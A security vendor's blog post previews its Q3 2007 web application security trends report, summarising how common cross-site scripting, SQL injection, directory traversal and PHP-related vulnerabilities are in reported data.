Q3 2007 Trends Report: First Look

Cenzic's CIA Labs will be releasing our Application Security Trends Report for Q3 2007 next week but I wanted to give our blog readers a first look into our results. First though a few remarks are in order about the report itself for those who haven't read our previous application security trend reports. Cenzic's trends report is an industry first in many ways. Its only such report of its type that focuses entirely upon application-layer vulnerabilities, attacks, and trends. Symantec's Internet Security Threat Report, now on volume 12, is the best security trend report in publication, but its focus is also very broad and web application security is only a very small part of the overall content. Understandably, the Symantec threat reports have a much broader goal and scope than our own, and being an avid reader of the Symantec report, I noticed the need for a security trends report that focused entirely on web application security. It was our (lofty) goal to do for web application security what Symantec's report does for Internet security in general, and although this sets a very high bar, its the gradual striving toward this goal which means that our trends report will continue to evolve and improve over time.
        I want to take a moment and thank all those who contribute to the report. Since we began producing this trend report in Q1 2007 we've already seen some interesting emerging trends within the data. Although Cenzic CIA Labs performs all the research, the final report is a cooperative effort that relies on individual contributions from people both within Cenzic and a network of friends and contacts. And of course our report could not be what it is without dshield.org and the CVE (of which I am an editorial board member).
        Our Q3 trends report signals in many ways "business as usual" in the application security space. In other words, many core trends remain the same:
        1. Web application vulnerabilities continue to comprise the largest part of all vulnerability data. In Q3 2007 web application security vulnerabilities comprised 68% of the total vulnerability information.
        2. Cross-Site Scripting continues to be the most prevalent web application vulnerability reported, with SQL Injection and RFI attacks not far behind.
        3. Directory Traversal vulnerabilities, the dot-dot-slash type attacks (../../) are among the least reported web application vulnerability types, typically ranging from less than 1 to 4% of the total web application vulnerability volume.
        4.  SQL injection vulnerabilities still continue to constitute roughly 20% of the total web application vulnerability volume. In other words, 1 out of 5 reported vulnerabilities is usually a SQL related vulnerability.
        5.  Insecure coding practices in PHP continue to contribute to 30% of the total web application vulnerability volume. Vulnerabilities in PHP itself, as a programming language,  tend to contribute 1-3% of the total vulnerability volume, indicating its insecurity coding practices, and not PHP as a programming language, that contribute to the usual storm of PHP-related vulnerabilities.
        These are some of the trends that have remained constant since our first trends report in Q1, trends further substantiated by the result of our Q3 report and analysis. There are several emerging trends that signal the affects of Web 2.0 programming practices and architectures within the reported vulnerability information, but if you want to learn more about these trends, you'll have to read our full report when its published next week.

Thanks again to all our readers,

-Tom S.